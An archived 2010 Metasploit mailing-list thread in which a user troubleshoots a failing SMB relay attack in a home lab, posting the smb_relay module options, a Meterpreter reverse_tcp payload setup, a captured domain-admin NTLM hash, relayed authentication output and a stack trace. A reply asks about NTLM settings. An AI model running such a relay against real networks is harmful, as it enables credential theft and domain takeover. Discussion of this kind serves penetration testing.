Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: SMB_RELAY attacks still possible?

From: Kurt Grutzmacher <grutz () jingojango net>
Date: Fri, 24 Dec 2010 23:53:13 -0500
Hi Brian,

SMBRELAY attacks should still work depending upon your negotiated NTLM
settings and what is currently supported within Metasploit's library. Can
you confirm that metasploit to DC works via smb_login or psexec? If yes then
SMBRELAY really should work.

What version of Windows is your DC running?

--
 Kurt Grutzmacher -=- grutz () jingojango net


On Fri, Dec 24, 2010 at 3:25 PM, Epic <epicdonk () gmail com> wrote:


I should also note, that I have confirmed it is possible to go from
192.168.0.2->\\192.168.0.1\ADMIN$ manually using the currently logged in
credentials.


On Fri, Dec 24, 2010 at 1:22 PM, Brian S Traveling <epicdonk () gmail com>wrote:


Hi,

Is it possible to still carry out smb_relay attacks by specifying a
different SMBHOST?  It doesn't seem to be working for me...  I was
under the assumption it was still possible...

my test environment:
domain controller: 192.168.0.1 (also dhcp/router)
windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to
domain)
metasploit box: 192.168.0.35 (not joined to domain)


msf exploit(smb_relay) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SMBHOST     192.168.0.1      no        The target SMB server (leave
empty for originating system)
  SRVHOST     192.168.0.35     yes       The local host to listen on.
  SRVPORT     445              yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming
connections
  SSLVersion  SSL3             no        Specify the version of SSL
that should be used (accepted: SSL2, SSL3, TLS1)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread,
none, process
  LHOST     192.168.0.35     yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.35:4444
[*] Server started.
msf exploit(smb_relay) > [*] Received 192.168.0.2:62573
MYDOMAIN\domainadmin
LMHASH:000000000000000000000000000000000000000000000000

NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000
OS: LM:
[*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin...
[*] AUTHENTICATED as MYDOMAIN\domainadmin...
[*] Connecting to the ADMIN$ share...
[*] Error processing request from 192.168.0.2:62573 (115):
Rex::Proto::SMB::Exceptions::ErrorCode The server responded with
error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in
`smb_recv_parse'/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in

`tree_connect'/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in
`connect'(eval):133:in `smb_haxor'(eval):530:in
`smb_cmd_session_setup'(eval):332:in
`smb_cmd_dispatch'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in
`smb_recv'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in
`on_client_data'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in
`start_service'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in
`call'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in
`on_client_data'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in
`monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in
`each'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in
`monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in
`start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in
`start'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in
`start_service'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in
`exploit'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in
`job_run_proc'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in
`run'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in
`call'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in
`start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in
`start'/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in
`start_bg_job'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in
`run'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in

`exploit_simple'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in

`exploit_simple'/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in

`cmd_exploit'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in
`send'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in

`run_command'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in

`run_single'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in
`each'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in
`run_single'/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in
`run'/usr/local/bin/msfconsole:124/SMBRelay

Thanks!




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: